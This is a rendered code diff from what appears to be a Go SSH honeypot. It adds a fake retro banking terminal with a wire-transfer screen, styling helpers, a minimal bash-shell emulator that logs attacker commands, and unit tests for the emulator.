||||||
|
case transferStepMemo:
|
||||||
|
m.transfer.Memo = val
|
||||||
|
}
|
||||||
|
m.step++
|
||||||
|
return m, nil
|
||||||
|
case tea.KeyBackspace:
|
||||||
|
if len(m.fields[m.step]) > 0 {
|
||||||
|
m.fields[m.step] = m.fields[m.step][:len(m.fields[m.step])-1]
|
||||||
|
}
|
||||||
|
default:
|
||||||
|
ch := keyMsg.String()
|
||||||
|
if len(ch) == 1 && ch[0] >= 32 && ch[0] < 127 && len(m.fields[m.step]) < 40 {
|
||||||
|
m.fields[m.step] += ch
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return m, nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func (m transferModel) View() string {
|
||||||
|
var b strings.Builder
|
||||||
|
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(centerText("WIRE TRANSFER"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(thinDivider())
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
|
||||||
|
// Show completed fields.
|
||||||
|
for i := 0; i < m.step && i < len(transferPrompts); i++ {
|
||||||
|
if i == transferStepConfirm {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
prompt := transferPrompts[i]
|
||||||
|
if prompt == "" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
b.WriteString(baseStyle.Render(prompt))
|
||||||
|
b.WriteString(baseStyle.Render(m.fields[i]))
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Current field.
|
||||||
|
switch {
|
||||||
|
case m.step == transferStepConfirm:
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(titleStyle.Render(" === TRANSFER SUMMARY ==="))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(baseStyle.Render(fmt.Sprintf(" ROUTING: %s", m.transfer.RoutingNumber)))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(baseStyle.Render(fmt.Sprintf(" ACCOUNT: %s", m.transfer.DestAccount)))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(baseStyle.Render(fmt.Sprintf(" BENEFICIARY: %s", m.transfer.Beneficiary)))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(baseStyle.Render(fmt.Sprintf(" BANK: %s", m.transfer.BankName)))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(baseStyle.Render(fmt.Sprintf(" AMOUNT: $%s", m.transfer.Amount)))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(baseStyle.Render(fmt.Sprintf(" MEMO: %s", m.transfer.Memo)))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(titleStyle.Render(" CONFIRM TRANSFER? (Y/N): "))
|
||||||
|
b.WriteString(inputStyle.Render(m.confirm))
|
||||||
|
b.WriteString(inputStyle.Render("_"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
case m.step == transferStepComplete:
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(thinDivider())
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(titleStyle.Render(" TRANSFER QUEUED FOR PROCESSING"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
routing := m.transfer.RoutingNumber
|
||||||
|
if len(routing) > 4 {
|
||||||
|
routing = routing[:4]
|
||||||
|
}
|
||||||
|
b.WriteString(baseStyle.Render(fmt.Sprintf(" CONFIRMATION #: WR-%s-%s",
|
||||||
|
routing, "847291")))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(baseStyle.Render(" STATUS: PENDING FEDWIRE SETTLEMENT"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(baseStyle.Render(" ESTIMATED COMPLETION: NEXT BUSINESS DAY"))
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(dimStyle.Render(" PRESS ANY KEY TO RETURN TO MAIN MENU"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
case m.step < len(transferPrompts):
|
||||||
|
prompt := transferPrompts[m.step]
|
||||||
|
b.WriteString(titleStyle.Render(prompt))
|
||||||
|
b.WriteString(inputStyle.Render(m.fields[m.step]))
|
||||||
|
b.WriteString(inputStyle.Render("_"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
|
|
||||||
|
if m.step < transferStepConfirm {
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(thinDivider())
|
||||||
|
b.WriteString("\n\n")
|
||||||
|
b.WriteString(dimStyle.Render(fmt.Sprintf(" STEP %d OF 6", m.step+1)))
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
|
|
||||||
|
return b.String()
|
||||||
|
}
|
||||||
168
internal/shell/banking/style.go
Normal file
168
internal/shell/banking/style.go
Normal file
@@ -0,0 +1,168 @@
|
|||||||
|
package banking
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"strings"
|
||||||
|
|
||||||
|
"github.com/charmbracelet/lipgloss"
|
||||||
|
)
|
||||||
|
|
||||||
|
const termWidth = 80
|
||||||
|
|
||||||
|
// Color palette — green-on-black retro terminal.
|
||||||
|
var (
|
||||||
|
colorGreen = lipgloss.Color("#00FF00")
|
||||||
|
colorDim = lipgloss.Color("#007700")
|
||||||
|
colorBlack = lipgloss.Color("#000000")
|
||||||
|
colorBright = lipgloss.Color("#AAFFAA")
|
||||||
|
colorRed = lipgloss.Color("#FF3333")
|
||||||
|
)
|
||||||
|
|
||||||
|
// Reusable styles.
|
||||||
|
var (
|
||||||
|
baseStyle = lipgloss.NewStyle().
|
||||||
|
Foreground(colorGreen).
|
||||||
|
Background(colorBlack)
|
||||||
|
|
||||||
|
headerStyle = lipgloss.NewStyle().
|
||||||
|
Foreground(colorBright).
|
||||||
|
Background(colorBlack).
|
||||||
|
Bold(true).
|
||||||
|
Width(termWidth).
|
||||||
|
Align(lipgloss.Center)
|
||||||
|
|
||||||
|
titleStyle = lipgloss.NewStyle().
|
||||||
|
Foreground(colorGreen).
|
||||||
|
Background(colorBlack).
|
||||||
|
Bold(true)
|
||||||
|
|
||||||
|
dimStyle = lipgloss.NewStyle().
|
||||||
|
Foreground(colorDim).
|
||||||
|
Background(colorBlack)
|
||||||
|
|
||||||
|
errorStyle = lipgloss.NewStyle().
|
||||||
|
Foreground(colorRed).
|
||||||
|
Background(colorBlack).
|
||||||
|
Bold(true)
|
||||||
|
|
||||||
|
inputStyle = lipgloss.NewStyle().
|
||||||
|
Foreground(colorBright).
|
||||||
|
Background(colorBlack)
|
||||||
|
)
|
||||||
|
|
||||||
|
// divider returns an 80-column === line.
|
||||||
|
func divider() string {
|
||||||
|
return dimStyle.Render(strings.Repeat("=", termWidth))
|
||||||
|
}
|
||||||
|
|
||||||
|
// thinDivider returns an 80-column --- line.
|
||||||
|
func thinDivider() string {
|
||||||
|
return dimStyle.Render(strings.Repeat("-", termWidth))
|
||||||
|
}
|
||||||
|
|
||||||
|
// centerText centers text within 80 columns.
|
||||||
|
func centerText(s string) string {
|
||||||
|
return headerStyle.Render(s)
|
||||||
|
}
|
||||||
|
|
||||||
|
// padRight pads a string to the given width.
|
||||||
|
func padRight(s string, width int) string {
|
||||||
|
if len(s) >= width {
|
||||||
|
return s[:width]
|
||||||
|
}
|
||||||
|
return s + strings.Repeat(" ", width-len(s))
|
||||||
|
}
|
||||||
|
|
||||||
|
// formatCurrency formats cents as $X,XXX.XX
|
||||||
|
func formatCurrency(cents int64) string {
|
||||||
|
negative := cents < 0
|
||||||
|
if negative {
|
||||||
|
cents = -cents
|
||||||
|
}
|
||||||
|
dollars := cents / 100
|
||||||
|
remainder := cents % 100
|
||||||
|
|
||||||
|
// Add thousands separators.
|
||||||
|
ds := fmt.Sprintf("%d", dollars)
|
||||||
|
if len(ds) > 3 {
|
||||||
|
var parts []string
|
||||||
|
for len(ds) > 3 {
|
||||||
|
parts = append([]string{ds[len(ds)-3:]}, parts...)
|
||||||
|
ds = ds[:len(ds)-3]
|
||||||
|
}
|
||||||
|
parts = append([]string{ds}, parts...)
|
||||||
|
ds = strings.Join(parts, ",")
|
||||||
|
}
|
||||||
|
|
||||||
|
if negative {
|
||||||
|
return fmt.Sprintf("-$%s.%02d", ds, remainder)
|
||||||
|
}
|
||||||
|
return fmt.Sprintf("$%s.%02d", ds, remainder)
|
||||||
|
}
|
||||||
|
|
||||||
|
// padLine pads a single line (which may contain ANSI codes) to termWidth
|
||||||
|
// using its visual width. Padding uses a black background so the terminal's
|
||||||
|
// default background doesn't bleed through.
|
||||||
|
func padLine(line string) string {
|
||||||
|
w := lipgloss.Width(line)
|
||||||
|
if w >= termWidth {
|
||||||
|
return line
|
||||||
|
}
|
||||||
|
return line + baseStyle.Render(strings.Repeat(" ", termWidth-w))
|
||||||
|
}
|
||||||
|
|
||||||
|
// padLines pads every line in a multi-line string to termWidth so that
|
||||||
|
// shorter lines fully overwrite previous content in the terminal.
|
||||||
|
func padLines(s string) string {
|
||||||
|
lines := strings.Split(s, "\n")
|
||||||
|
for i, line := range lines {
|
||||||
|
lines[i] = padLine(line)
|
||||||
|
}
|
||||||
|
return strings.Join(lines, "\n")
|
||||||
|
}
|
||||||
|
|
||||||
|
// screenFrame wraps content in the persistent header and footer.
|
||||||
|
// The height parameter is used to pad the output to fill the terminal,
|
||||||
|
// preventing leftover lines from previous renders bleeding through.
|
||||||
|
func screenFrame(bankName, terminalID, region, content string, height int) string {
|
||||||
|
var b strings.Builder
|
||||||
|
|
||||||
|
// Header (4 lines).
|
||||||
|
b.WriteString(divider())
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(centerText(bankName + " FEDERAL RESERVE SYSTEM"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(centerText("SECURE BANKING TERMINAL"))
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(divider())
|
||||||
|
b.WriteString("\n")
|
||||||
|
|
||||||
|
// Content.
|
||||||
|
b.WriteString(content)
|
||||||
|
|
||||||
|
// Pad with blank lines between content and footer so the footer
|
||||||
|
// stays at the bottom and the total output fills the terminal height.
|
||||||
|
if height > 0 {
|
||||||
|
const headerLines = 4
|
||||||
|
const footerLines = 2
|
||||||
|
// strings.Count gives newlines; add 1 for the line after the last \n.
|
||||||
|
contentLines := strings.Count(content, "\n") + 1
|
||||||
|
used := headerLines + contentLines + footerLines
|
||||||
|
blankLine := baseStyle.Render(strings.Repeat(" ", termWidth))
|
||||||
|
for i := used; i < height; i++ {
|
||||||
|
b.WriteString(blankLine)
|
||||||
|
b.WriteString("\n")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// Footer (2 lines).
|
||||||
|
b.WriteString("\n")
|
||||||
|
b.WriteString(divider())
|
||||||
|
b.WriteString("\n")
|
||||||
|
footer := fmt.Sprintf(" TERMINAL: %s | REGION: %s | ENCRYPTED SESSION ACTIVE", terminalID, region)
|
||||||
|
b.WriteString(dimStyle.Render(padRight(footer, termWidth)))
|
||||||
|
|
||||||
|
// Pad every line to full terminal width so shorter lines overwrite
|
||||||
|
// leftover content from previous renders.
|
||||||
|
return padLines(b.String())
|
||||||
|
}
|
||||||
108
internal/shell/bash/bash.go
Normal file
108
internal/shell/bash/bash.go
Normal file
@@ -0,0 +1,108 @@
|
|||||||
|
package bash
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"io"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell"
|
||||||
|
)
|
||||||
|
|
||||||
|
const sessionTimeout = 5 * time.Minute
|
||||||
|
|
||||||
|
// BashShell emulates a basic bash-like shell.
|
||||||
|
type BashShell struct{}
|
||||||
|
|
||||||
|
// NewBashShell returns a new BashShell instance.
|
||||||
|
func NewBashShell() *BashShell {
|
||||||
|
return &BashShell{}
|
||||||
|
}
|
||||||
|
|
||||||
|
func (b *BashShell) Name() string { return "bash" }
|
||||||
|
func (b *BashShell) Description() string { return "Basic bash-like shell emulator" }
|
||||||
|
|
||||||
|
func (b *BashShell) Handle(ctx context.Context, sess *shell.SessionContext, rw io.ReadWriteCloser) error {
|
||||||
|
ctx, cancel := context.WithTimeout(ctx, sessionTimeout)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
username := sess.Username
|
||||||
|
if sess.CommonConfig.FakeUser != "" {
|
||||||
|
username = sess.CommonConfig.FakeUser
|
||||||
|
}
|
||||||
|
hostname := sess.CommonConfig.Hostname
|
||||||
|
|
||||||
|
fs := newFilesystem(hostname)
|
||||||
|
state := &shellState{
|
||||||
|
cwd: "/root",
|
||||||
|
username: username,
|
||||||
|
hostname: hostname,
|
||||||
|
fs: fs,
|
||||||
|
}
|
||||||
|
|
||||||
|
// Send banner.
|
||||||
|
if sess.CommonConfig.Banner != "" {
|
||||||
|
fmt.Fprint(rw, sess.CommonConfig.Banner)
|
||||||
|
}
|
||||||
|
fmt.Fprintf(rw, "Last login: %s from 10.0.0.1\r\n",
|
||||||
|
time.Now().Add(-2*time.Hour).Format("Mon Jan 2 15:04:05 2006"))
|
||||||
|
|
||||||
|
for {
|
||||||
|
prompt := formatPrompt(state)
|
||||||
|
if _, err := fmt.Fprint(rw, prompt); err != nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
line, err := shell.ReadLine(ctx, rw)
|
||||||
|
if errors.Is(err, io.EOF) {
|
||||||
|
fmt.Fprint(rw, "logout\r\n")
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
if err != nil {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
trimmed := strings.TrimSpace(line)
|
||||||
|
if trimmed == "" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
result := dispatch(state, trimmed)
|
||||||
|
|
||||||
|
var output string
|
||||||
|
if result.output != "" {
|
||||||
|
output = result.output
|
||||||
|
// Convert newlines to \r\n for terminal display.
|
||||||
|
output = strings.ReplaceAll(output, "\r\n", "\n")
|
||||||
|
output = strings.ReplaceAll(output, "\n", "\r\n")
|
||||||
|
fmt.Fprintf(rw, "%s\r\n", output)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Log command and output to store.
|
||||||
|
if sess.Store != nil {
|
||||||
|
if err := sess.Store.AppendSessionLog(ctx, sess.SessionID, trimmed, output); err != nil {
|
||||||
|
return fmt.Errorf("append session log: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if sess.OnCommand != nil {
|
||||||
|
sess.OnCommand("bash")
|
||||||
|
}
|
||||||
|
|
||||||
|
if result.exit {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func formatPrompt(state *shellState) string {
|
||||||
|
cwd := state.cwd
|
||||||
|
if cwd == "/root" {
|
||||||
|
cwd = "~"
|
||||||
|
} else if strings.HasPrefix(cwd, "/root/") {
|
||||||
|
cwd = "~" + cwd[5:]
|
||||||
|
}
|
||||||
|
return fmt.Sprintf("%s@%s:%s# ", state.username, state.hostname, cwd)
|
||||||
|
}
|
||||||
|
|
||||||
199
internal/shell/bash/bash_test.go
Normal file
199
internal/shell/bash/bash_test.go
Normal file
@@ -0,0 +1,199 @@
|
|||||||
|
package bash
|
||||||
|
|
||||||
|
import (
|
||||||
|
"bytes"
|
||||||
|
"context"
|
||||||
|
"errors"
|
||||||
|
"io"
|
||||||
|
"strings"
|
||||||
|
"testing"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/shell"
|
||||||
|
"code.t-juice.club/torjus/oubliette/internal/storage"
|
||||||
|
)
|
||||||
|
|
||||||
|
type rwCloser struct {
|
||||||
|
io.Reader
|
||||||
|
io.Writer
|
||||||
|
closed bool
|
||||||
|
}
|
||||||
|
|
||||||
|
func (r *rwCloser) Close() error {
|
||||||
|
r.closed = true
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestFormatPrompt(t *testing.T) {
|
||||||
|
tests := []struct {
|
||||||
|
cwd string
|
||||||
|
want string
|
||||||
|
}{
|
||||||
|
{"/root", "root@host:~# "},
|
||||||
|
{"/root/sub", "root@host:~/sub# "},
|
||||||
|
{"/tmp", "root@host:/tmp# "},
|
||||||
|
{"/", "root@host:/# "},
|
||||||
|
}
|
||||||
|
|
||||||
|
for _, tt := range tests {
|
||||||
|
state := &shellState{cwd: tt.cwd, username: "root", hostname: "host"}
|
||||||
|
got := formatPrompt(state)
|
||||||
|
if got != tt.want {
|
||||||
|
t.Errorf("formatPrompt(cwd=%q) = %q, want %q", tt.cwd, got, tt.want)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestReadLineEnter(t *testing.T) {
|
||||||
|
input := bytes.NewBufferString("hello\r")
|
||||||
|
var output bytes.Buffer
|
||||||
|
rw := struct {
|
||||||
|
io.Reader
|
||||||
|
io.Writer
|
||||||
|
}{input, &output}
|
||||||
|
|
||||||
|
ctx := context.Background()
|
||||||
|
line, err := shell.ReadLine(ctx, rw)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("readLine: %v", err)
|
||||||
|
}
|
||||||
|
if line != "hello" {
|
||||||
|
t.Errorf("line = %q, want %q", line, "hello")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestReadLineBackspace(t *testing.T) {
|
||||||
|
// Type "helo", backspace, then "lo\r"
|
||||||
|
input := bytes.NewBuffer([]byte{'h', 'e', 'l', 'o', 127, 'l', 'o', '\r'})
|
||||||
|
var output bytes.Buffer
|
||||||
|
rw := struct {
|
||||||
|
io.Reader
|
||||||
|
io.Writer
|
||||||
|
}{input, &output}
|
||||||
|
|
||||||
|
ctx := context.Background()
|
||||||
|
line, err := shell.ReadLine(ctx, rw)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("readLine: %v", err)
|
||||||
|
}
|
||||||
|
if line != "hello" {
|
||||||
|
t.Errorf("line = %q, want %q", line, "hello")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestReadLineCtrlC(t *testing.T) {
|
||||||
|
input := bytes.NewBuffer([]byte("partial\x03"))
|
||||||
|
var output bytes.Buffer
|
||||||
|
rw := struct {
|
||||||
|
io.Reader
|
||||||
|
io.Writer
|
||||||
|
}{input, &output}
|
||||||
|
|
||||||
|
ctx := context.Background()
|
||||||
|
line, err := shell.ReadLine(ctx, rw)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("readLine: %v", err)
|
||||||
|
}
|
||||||
|
if line != "" {
|
||||||
|
t.Errorf("line after Ctrl+C = %q, want empty", line)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestReadLineCtrlD(t *testing.T) {
|
||||||
|
input := bytes.NewBuffer([]byte{4}) // Ctrl+D on empty line
|
||||||
|
var output bytes.Buffer
|
||||||
|
rw := struct {
|
||||||
|
io.Reader
|
||||||
|
io.Writer
|
||||||
|
}{input, &output}
|
||||||
|
|
||||||
|
ctx := context.Background()
|
||||||
|
_, err := shell.ReadLine(ctx, rw)
|
||||||
|
if !errors.Is(err, io.EOF) {
|
||||||
|
t.Fatalf("expected io.EOF, got %v", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestBashShellHandle(t *testing.T) {
|
||||||
|
store := storage.NewMemoryStore()
|
||||||
|
sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "root", "bash", "")
|
||||||
|
|
||||||
|
sess := &shell.SessionContext{
|
||||||
|
SessionID: sessID,
|
||||||
|
Username: "root",
|
||||||
|
Store: store,
|
||||||
|
CommonConfig: shell.ShellCommonConfig{
|
||||||
|
Hostname: "testhost",
|
||||||
|
Banner: "Welcome to Ubuntu 22.04.3 LTS\r\n\r\n",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
// Simulate typing commands followed by "exit\r"
|
||||||
|
commands := "pwd\rwhoami\rexit\r"
|
||||||
|
clientInput := bytes.NewBufferString(commands)
|
||||||
|
var clientOutput bytes.Buffer
|
||||||
|
rw := &rwCloser{
|
||||||
|
Reader: clientInput,
|
||||||
|
Writer: &clientOutput,
|
||||||
|
}
|
||||||
|
|
||||||
|
sh := NewBashShell()
|
||||||
|
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
err := sh.Handle(ctx, sess, rw)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("Handle: %v", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
output := clientOutput.String()
|
||||||
|
|
||||||
|
// Should contain banner.
|
||||||
|
if !strings.Contains(output, "Welcome to Ubuntu") {
|
||||||
|
t.Error("output should contain banner")
|
||||||
|
}
|
||||||
|
|
||||||
|
// Should contain prompt with hostname.
|
||||||
|
if !strings.Contains(output, "root@testhost") {
|
||||||
|
t.Errorf("output should contain prompt, got: %s", output)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check session logs were recorded.
|
||||||
|
if len(store.SessionLogs) < 2 {
|
||||||
|
t.Errorf("expected at least 2 session logs, got %d", len(store.SessionLogs))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestBashShellFakeUser(t *testing.T) {
|
||||||
|
store := storage.NewMemoryStore()
|
||||||
|
sessID, _ := store.CreateSession(context.Background(), "127.0.0.1", "attacker", "bash", "")
|
||||||
|
|
||||||
|
sess := &shell.SessionContext{
|
||||||
|
SessionID: sessID,
|
||||||
|
Username: "attacker",
|
||||||
|
Store: store,
|
||||||
|
CommonConfig: shell.ShellCommonConfig{
|
||||||
|
Hostname: "testhost",
|
||||||
|
FakeUser: "admin",
|
||||||
|
},
|
||||||
|
}
|
||||||
|
|
||||||
|
commands := "whoami\rexit\r"
|
||||||
|
clientInput := bytes.NewBufferString(commands)
|
||||||
|
var clientOutput bytes.Buffer
|
||||||
|
rw := &rwCloser{
|
||||||
|
Reader: clientInput,
|
||||||
|
Writer: &clientOutput,
|
||||||
|
}
|
||||||
|
|
||||||
|
sh := NewBashShell()
|
||||||
|
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
|
||||||
|
defer cancel()
|
||||||
|
|
||||||
|
sh.Handle(ctx, sess, rw)
|
||||||
|
|
||||||
|
output := clientOutput.String()
|
||||||
|
if !strings.Contains(output, "admin") {
|
||||||
|
t.Errorf("output should contain fake user 'admin', got: %s", output)
|
||||||
|
}
|
||||||
|
}
|
||||||
119
internal/shell/bash/commands.go
Normal file
119
internal/shell/bash/commands.go
Normal file
@@ -0,0 +1,119 @@
|
|||||||
|
package bash
|
||||||
|
|
||||||
|
import (
|
||||||
|
"fmt"
|
||||||
|
"runtime"
|
||||||
|
"sort"
|
||||||
|
"strings"
|
||||||
|
)
|
||||||
|
|
||||||
|
type shellState struct {
|
||||||
|
cwd string
|
||||||
|
username string
|
||||||
|
hostname string
|
||||||
|
fs *filesystem
|
||||||
|
}
|
||||||
|
|
||||||
|
type commandResult struct {
|
||||||
|
output string
|
||||||
|
exit bool
|
||||||
|
}
|
||||||
|
|
||||||
|
func dispatch(state *shellState, line string) commandResult {
|
||||||
|
fields := strings.Fields(line)
|
||||||
|
if len(fields) == 0 {
|
||||||
|
return commandResult{}
|
||||||
|
}
|
||||||
|
|
||||||
|
cmd := fields[0]
|
||||||
|
args := fields[1:]
|
||||||
|
|
||||||
|
switch cmd {
|
||||||
|
case "pwd":
|
||||||
|
return commandResult{output: state.cwd}
|
||||||
|
case "whoami":
|
||||||
|
return commandResult{output: state.username}
|
||||||
|
case "hostname":
|
||||||
|
return commandResult{output: state.hostname}
|
||||||
|
case "id":
|
||||||
|
return cmdID(state)
|
||||||
|
case "uname":
|
||||||
|
return cmdUname(state, args)
|
||||||
|
case "ls":
|
||||||
|
return cmdLs(state, args)
|
||||||
|
case "cd":
|
||||||
|
return cmdCd(state, args)
|
||||||
|
case "cat":
|
||||||
|
return cmdCat(state, args)
|
||||||
|
case "exit", "logout":
|
||||||
|
return commandResult{exit: true}
|
||||||
|
default:
|
||||||
|
return commandResult{output: fmt.Sprintf("%s: command not found", cmd)}
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func cmdID(state *shellState) commandResult {
|
||||||
|
return commandResult{
|
||||||
|
output: fmt.Sprintf("uid=0(%s) gid=0(%s) groups=0(%s)", state.username, state.username, state.username),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func cmdUname(state *shellState, args []string) commandResult {
|
||||||
|
if len(args) > 0 && args[0] == "-a" {
|
||||||
|
return commandResult{
|
||||||
|
output: fmt.Sprintf("Linux %s 5.15.0-89-generic #99-Ubuntu SMP Mon Oct 30 20:42:41 UTC 2023 %s GNU/Linux", state.hostname, runtime.GOARCH),
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return commandResult{output: "Linux"}
|
||||||
|
}
|
||||||
|
|
||||||
|
func cmdLs(state *shellState, args []string) commandResult {
|
||||||
|
target := state.cwd
|
||||||
|
if len(args) > 0 {
|
||||||
|
target = resolvePath(state.cwd, args[0])
|
||||||
|
}
|
||||||
|
|
||||||
|
names, err := state.fs.list(target)
|
||||||
|
if err != nil {
|
||||||
|
return commandResult{output: err.Error()}
|
||||||
|
}
|
||||||
|
|
||||||
|
sort.Strings(names)
|
||||||
|
return commandResult{output: strings.Join(names, " ")}
|
||||||
|
}
|
||||||
|
|
||||||
|
func cmdCd(state *shellState, args []string) commandResult {
|
||||||
|
target := "/root"
|
||||||
|
if len(args) > 0 {
|
||||||
|
target = resolvePath(state.cwd, args[0])
|
||||||
|
}
|
||||||
|
|
||||||
|
if !state.fs.exists(target) {
|
||||||
|
return commandResult{output: fmt.Sprintf("bash: cd: %s: No such file or directory", args[0])}
|
||||||
|
}
|
||||||
|
if !state.fs.isDirectory(target) {
|
||||||
|
return commandResult{output: fmt.Sprintf("bash: cd: %s: Not a directory", args[0])}
|
||||||
|
}
|
||||||
|
|
||||||
|
state.cwd = target
|
||||||
|
return commandResult{}
|
||||||
|
}
|
||||||
|
|
||||||
|
func cmdCat(state *shellState, args []string) commandResult {
|
||||||
|
if len(args) == 0 {
|
||||||
|
return commandResult{}
|
||||||
|
}
|
||||||
|
|
||||||
|
var parts []string
|
||||||
|
for _, arg := range args {
|
||||||
|
p := resolvePath(state.cwd, arg)
|
||||||
|
content, err := state.fs.read(p)
|
||||||
|
if err != nil {
|
||||||
|
parts = append(parts, err.Error())
|
||||||
|
} else {
|
||||||
|
parts = append(parts, strings.TrimRight(content, "\n"))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
return commandResult{output: strings.Join(parts, "\n")}
|
||||||
|
}
|
||||||
201
internal/shell/bash/commands_test.go
Normal file
201
internal/shell/bash/commands_test.go
Normal file
@@ -0,0 +1,201 @@
|
|||||||
|
package bash
|
||||||
|
|
||||||
|
import (
|
||||||
|
"strings"
|
||||||
|
"testing"
|
||||||
|
)
|
||||||
|
|
||||||
|
func newTestState() *shellState {
|
||||||
|
fs := newFilesystem("testhost")
|
||||||
|
return &shellState{
|
||||||
|
cwd: "/root",
|
||||||
|
username: "root",
|
||||||
|
hostname: "testhost",
|
||||||
|
fs: fs,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdPwd(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "pwd")
|
||||||
|
if r.output != "/root" {
|
||||||
|
t.Errorf("pwd = %q, want %q", r.output, "/root")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdWhoami(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "whoami")
|
||||||
|
if r.output != "root" {
|
||||||
|
t.Errorf("whoami = %q, want %q", r.output, "root")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdHostname(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "hostname")
|
||||||
|
if r.output != "testhost" {
|
||||||
|
t.Errorf("hostname = %q, want %q", r.output, "testhost")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdId(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "id")
|
||||||
|
if !strings.Contains(r.output, "uid=0(root)") {
|
||||||
|
t.Errorf("id output = %q, want uid=0(root)", r.output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdUnameBasic(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "uname")
|
||||||
|
if r.output != "Linux" {
|
||||||
|
t.Errorf("uname = %q, want %q", r.output, "Linux")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdUnameAll(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "uname -a")
|
||||||
|
if !strings.HasPrefix(r.output, "Linux testhost") {
|
||||||
|
t.Errorf("uname -a = %q, want prefix 'Linux testhost'", r.output)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdLs(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "ls")
|
||||||
|
if r.output == "" {
|
||||||
|
t.Error("ls should return non-empty output")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
func TestCmdLsPath(t *testing.T) {
|
||||||
|
state := newTestState()
|
||||||
|
r := dispatch(state, "ls /etc")
|
||||||
|
